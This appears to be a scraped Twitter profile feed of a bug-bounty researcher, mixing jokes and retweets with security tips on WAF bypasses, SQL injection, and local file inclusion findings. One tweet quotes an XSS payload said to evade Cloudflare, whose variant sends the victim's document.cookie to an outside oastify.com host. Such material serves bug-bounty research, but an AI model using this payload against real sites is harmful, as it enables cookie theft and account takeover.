nav1n0x Profile Banner
N$ Profile
N$

@nav1n0x

Followers
27K
Following
6K
Media
633
Statuses
3K

Github: https://t.co/7MrKOcUFfO

Amsterdam, The Netherlands
Joined December 2010
Don't wanna be here? Send us removal request.
@nav1n0x
N$
11 months
I just Published - A Comprehensive Guide to Manually Hunting SQL Injection in MSSQL, MySQL, Oracle, and NoSQL (MongoDB) - I tried to explain everything I could. Let me know your opinion and suggestions, if any. I will keep updating the article whenever I
Tweet media one
16
257
929
@nav1n0x
N$
14 hours
Wow. .
@PicturesFoIder
non aesthetic things
21 hours
Autism can be crazy cool sometimes
0
0
2
@nav1n0x
N$
17 hours
Another billion-dollar FinTech looking for free labor.
Tweet media one
8
5
119
@nav1n0x
N$
2 days
This payload bypasses Cloudflare waf in certain cases: "top[8680439. toString(30)](document.domain)" or "top[8680439. toString(30)](new%20Image().src%3D%27 https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty
Tweet media one
Tweet media two
7
66
456
@nav1n0x
N$
4 days
πŸ˜‚πŸ˜‚.
@KeralaTourism
Kerala Tourism
4 days
Kerala, the destination you'll never want to leave. Thank you, The Fauxy. #F35 #Trivandrum #KeralaTourism
Tweet media one
1
0
3
@nav1n0x
N$
7 days
β˜• πŸ˜‚πŸ˜‚.
@VidsBanned
Banned Vids
8 days
Woman completely destroys a MacBook by dipping it in water for a vinyl skin. πŸ€¦β€β™‚οΈ
1
0
4
@nav1n0x
N$
12 days
I'm a very early Twitter user. I have two accounts β€” one is personal and somewhat business-related, created 18 years ago and registered in July 2007. The other account this was registered in December 2010. Now don't guess my age πŸ˜‚πŸ˜‚
Tweet media one
Tweet media two
6
1
51
@nav1n0x
N$
12 days
A hacker claims to have breached an Indian nuclear and chemical company and is selling over 80 databases containing employee details, locations, critical infrastructure information, and more in the darkweb market place. @IndianCERT @Cyberdost @NCIIPC @AskAnshul.
@DailyDarkWeb
Dark Web Intelligence
12 days
Indian Nuclear and Chemical Firm Allegedly Breached
Tweet media one
1
0
22
@nav1n0x
N$
13 days
This is a great tip for bypassing Cloudflare for SQLi/XSS etc. I recently tweeted something similar, where I managed to bypass a Cloudflare 403 bycombining multiple payloads, hope this helps πŸ‘‡
@k_firsov
Kirill Firsov
13 days
How to bypass Cloudflare WAF?.@FearsOff #bugbountytips #cloudflare #waf #bypass. 1. Found an SQL injection but getting blocked by Cloudflare?.Here's a pro tip 😏
Tweet media one
2
35
212
@nav1n0x
N$
13 days
What’s most valuable from a community member?.Choose honestly β€” what really earns your respect in the infosec community? . I’m asking because I’ve noticed a steep decline in knowledge sharing lately. Many seniors have stopped posting . Why do you think that is? #BugBounty.
6
5
19
@nav1n0x
N$
14 days
Here is the script if you're interested β€” not maintained, no warranty.
0
5
57
@nav1n0x
N$
14 days
Simple LFI using my path traversal script on GitHub. Used @0xAsm0d3us’s ParamSpider to gather URLs, filtered for relevant parameters, slightly modified the script to inject payloads into parameters like ?path and ?file, & ran the script β€” got 1 hit out of 20k+ URLs. The target is
Tweet media one
9
46
409
@nav1n0x
N$
15 days
"stealth"
Tweet media one
0
0
15
@nav1n0x
N$
16 days
So how does this work? There’s a login page that fetches custom imagesβ€”like the company logo, from the server using a script called CustomImages.aspx. This script is vulnerable to LFI. When accessed directly, the script doesn’t display anything. But if you use an LFI payload in
Tweet media one
2
0
41
@nav1n0x
N$
16 days
Discovered a cool Windows LFI during a pentest in a widely used tool. This might be a 0-day β€” I found over 5k+ affected installations. Possibly another CVE in the pipeline. Payload:
Tweet media one
Tweet media two
9
68
601
@nav1n0x
N$
17 days
πŸ˜‚πŸ˜‚.
@s8n
Satan
18 days
Tweet media one
0
1
10
@nav1n0x
N$
17 days
Triager: WHOIS lookup of the public IP shows it belongs to the ISP, not the organization you're testing. Me: No, thats not how you test, perform a reverse SSL lookup which shows the certificate on the IP is issued to the organization β€” so this IP is assigned to them, hence the.
1
4
102